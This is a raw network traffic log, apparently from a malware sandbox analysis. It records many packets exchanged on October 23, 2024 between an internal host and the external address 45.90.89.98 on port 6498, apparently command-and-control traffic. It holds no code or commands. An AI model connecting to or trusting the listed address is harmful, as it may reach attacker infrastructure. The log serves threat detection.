                                                                                                                                                                        Oct 23, 2024 17:27:25.361332893 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.361382961 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.361388922 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.361475945 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.378262997 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.378276110 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.378334999 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.378385067 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.378391027 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.378458977 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.378484964 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.378570080 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.378652096 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.378652096 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.378664017 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.378669977 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.378750086 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.378758907 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.378765106 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.378814936 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.379195929 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.379260063 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.379266024 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.379333973 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.379419088 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.379425049 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.379436970 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.379443884 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.379555941 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.380067110 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.430399895 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.430413961 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.430419922 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.430464029 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.430504084 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.430519104 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.430525064 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.430629969 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.479705095 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.479733944 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.479743958 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.479810953 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.480040073 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.496929884 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.496985912 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.496994019 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497045040 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.497045040 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.497083902 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497136116 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497266054 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.497275114 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497286081 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497351885 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.497361898 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497368097 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497374058 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497380018 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497407913 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.497450113 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.497961044 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497987986 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.497992992 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.498045921 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.498142004 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.498147011 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.498266935 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.498523951 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.498580933 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.498585939 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.498653889 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.549197912 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.549211025 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.549216032 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.549221992 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.549279928 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.549288034 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.549293041 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.549421072 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.598341942 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.598350048 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.598356009 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.598452091 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.615436077 CEST64984917545.90.89.98192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 17:27:25.615473032 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.615482092 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.615577936 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.615629911 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.615638971 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.615698099 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.615698099 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.615875959 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.615953922 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.615958929 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.616034985 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.616060972 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.616067886 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.616101980 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.616502047 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.616563082 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.616574049 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.616710901 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.616718054 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.616728067 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.616734028 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.616760969 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.616760969 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.616782904 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.617485046 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.617539883 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.617549896 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.617661953 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.618253946 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.667807102 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.667819023 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.667825937 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.668051958 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.709181070 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.709191084 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.709202051 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.709387064 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.717009068 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.717057943 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.717061996 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.717072010 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.717174053 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.734122992 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.734160900 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.734170914 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.734250069 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.734311104 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.734321117 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.734386921 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.734386921 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.734402895 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.734709978 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.734755039 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.734760046 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.734790087 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.735016108 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735065937 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735070944 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735133886 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.735133886 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.735335112 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735373020 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735378027 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735543013 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.735626936 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735677004 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735687971 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735810041 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735816002 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.735857964 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.735857964 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.736233950 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.736283064 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.736288071 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.736815929 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.737035036 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.786729097 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.786756992 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.786767960 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.786875963 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.827769041 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.827785969 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.827845097 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.828208923 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.836131096 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.836144924 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.836182117 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.836280107 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.836323977 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.836365938 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.852700949 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.852754116 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.852761984 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.852765083 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.852807045 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.852859974 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.852952957 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.852993965 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.853122950 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.853133917 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.853173971 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.853214025 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.853226900 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.853262901 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.853292942 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.853694916 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.853734970 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.853750944 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.853763103 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.853846073 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.853853941 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.853900909 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.853936911 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.854024887 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.854090929 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.854104042 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.854131937 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.854259968 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.854269981 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.854281902 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.854298115 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.854302883 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.854322910 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.854475975 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.854516029 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.854959965 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.854970932 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.855004072 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.855150938 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.855160952 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.855190992 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.855638027 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.905519009 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.905535936 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.905558109 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.905567884 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.905599117 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.905599117 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.946578979 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.946595907 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.946636915 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.947027922 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.955091000 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.955128908 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.955137968 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.955210924 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.955254078 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.955295086 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.971669912 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.971745968 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.971795082 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.971806049 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
Oct 23, 2024 17:27:25.971843958 CEST | 49175 | 6498 | 192.168.2.22 | 45.90.89.98
Oct 23, 2024 17:27:25.971890926 CEST | 6498 | 49175 | 45.90.89.98 | 192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.971901894 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.971937895 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.971970081 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.971980095 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.971990108 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.972018003 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.972745895 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.972790956 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.972825050 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.972835064 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.972846031 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.972875118 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.972918987 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.972961903 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.972978115 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.973052979 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.973062038 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.973099947 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.973340988 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.973412037 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.973453045 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.973541975 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.973553896 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.973566055 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.973592043 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.973650932 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.973663092 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.973692894 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.974021912 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.974067926 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:25.974082947 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:25.974351883 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:26.016884089 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.016901016 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.016943932 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.016946077 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:26.016954899 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.016982079 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:26.024230957 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.024277925 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.024290085 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.024324894 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:26.066550016 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.066576004 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.066587925 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:26.066600084 CEST491756498192.168.2.2245.90.89.98
